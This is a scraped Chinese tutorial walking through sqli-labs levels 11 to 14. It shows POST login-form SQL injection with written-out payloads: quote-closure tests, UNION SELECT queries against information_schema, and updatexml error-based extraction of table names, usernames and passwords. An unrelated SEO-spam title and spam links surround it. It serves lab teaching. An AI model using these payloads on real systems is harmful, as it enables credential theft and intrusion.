当前位置: 首页 > news >正文

内蒙古网站优化长期做网站应该购买稳定的空间

内蒙古网站优化,长期做网站应该购买稳定的空间,企业网站建设合同模板,网站开发一级分销前言 第1-10关都是get方法#xff0c;本关开始进入post方法。其实post也好get也好#xff0c;本质都差不多#xff0c;使用的技巧也基本相同。 Less11 第11关打开是一个输入用户名密码的界面 显然登陆对话框会使用post方式提交#xff0c;这里我们尝试在Username一栏通过…前言 第1-10关都是get方法本关开始进入post方法。其实post也好get也好本质都差不多使用的技巧也基本相同。 Less11 第11关打开是一个输入用户名密码的界面 显然登陆对话框会使用post方式提交这里我们尝试在Username一栏通过单引号闭合看看什么效果 提示有个报错看来就是单引号闭合那可以肯定这里有个注入点在Username框尝试注意每个输入前面都有个单引号空格是闭合变量用的不是手误 or 11 -- asd 是不是发现和第一关的get方法效果类似既然有回显那就尝试通过联合注入的方式先看看有多少列在Username框输入 union select 1 -- asd 这里报错了表示union后的列数不对当我们尝试 union select 1,2 -- asd 不仅对了而且还把联合注入部分回显到页面和第一关类似。那接下来就是获取数据库命了在Username框输入 union select database(),2 -- asd 得到数据库名为security。接着就是获取表名 union select 1,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) -- asd 显然users应该就是我们要找的表然后是查找列名 union select 1,(select group_concat(column_name) from information_schema.columns where table_nameusers) -- asd 列名中username和password应该就是我们要找的列然后查出用户名和密码 union select 1,(select group_concat(username) from users) -- asd union select 1,(select group_concat(password) from users) -- asd 通关 Less12 第十二关先输入单引号 显示错误再输入双引号 看报错信息应该是双引号和括号作为闭合测试一下在Username框输入 ) or 11 -- asd 成功那就确定了通过双引号括号闭合。剩下的参考第11关即可不再复述。 Less13 第13关先测试单引号 看来是单引号括号的闭合再测试 ) or 11 -- asd 确定了单引号括号的闭合但是这里没有登陆正确的回显。不过有错误的回显所以可以利用updatexml大法来处理和第五关的处理方式类似。在Username框输入 ) or updatexml(1,concat(~,database(),~),1) -- asd 找出了数据库名为security。然后找出对应表名Username对话框输入 ) or updatexml(1,concat(~,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1),~),1) -- asd 第一个表是emails我们逐个尝试当输入 ) or updatexml(1,concat(~,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1),~),1) -- asd 找出了users表。接着是列名同样我们逐个尝试后在输入以下两条时找到了username和password列名 ) or updatexml(1,concat(~,(select column_name from information_schema.columns where table_nameusers limit 4,1),~),1) -- asd ) or updatexml(1,concat(~,(select column_name from information_schema.columns where table_nameusers limit 5,1),~),1) -- asd 之后找出用户名Username框输入 ) or updatexml(1,concat(~,(select username from security.users limit 0,1),~),1) -- asd 密码 ) or updatexml(1,concat(~,(select password from security.users limit 0,1),~),1) -- asd 通关 Less14 第14关和13关类似区别仅在于通过双引号闭合其余都一样不另外叙述。
http://www.hkea.cn/news/14517764/

相关文章:

  • 物业管理网站开发背景360搜索联盟网站制作
  • 品牌建设网站例子包头企业网站建设
  • 上海公司注册代理服务西安seo服务外包
  • 营销的方法手段有哪些专业seo外包
  • 茶叶公司网站的建设大国工匠网页制作素材
  • 购物网站功能介绍中山网站建设制作
  • 自己电脑做网站 路由器wordpress网站编辑
  • 成都个人团队网站开发做化妆品网站
  • 江门网站企业信息化管理软件有哪些
  • 著名的电子商务网站在线查询企业
  • 网站内容栏由什么构成制作图片视频的软件
  • 深圳有哪些做网站的公司好建一个网站要多少钱
  • 荥阳市网站建设重庆能创科技有限公司
  • 中文域名有哪些网站企业网站的建设的目标人物是
  • 做画册的网站wordpress sql语句
  • 璧山集团网站建设傻瓜式建站软件下载
  • ps网站交互设计公司邮箱地址
  • 新建网站多少钱近两年成功的网络营销案例及分析
  • 大安市建设局网站怎么做本地化网站
  • 怎么免费建立自己的网站平台宁波江北区城市建设档案馆网站
  • 如何做网站网页流程外国ps修图网站
  • 抽奖网站开发wordpress 小程序教程
  • 设计师的素材网站中国化工建设协会网站
  • 惠州模板网站建设网站建设dqcx
  • 苏州免费网站制作图片识别 在线百度识图
  • 专业网站制作公司是如何处理一个优秀网站的做游戏钓鱼网站
  • 服装网站建设论文范文做网站学什么代码
  • 企业快速建站江苏中粟建设工程有限公司网站
  • 什么是传统网站衡阳的网站建设
  • 网站哪个公司做的比较好珠海网站建设那家好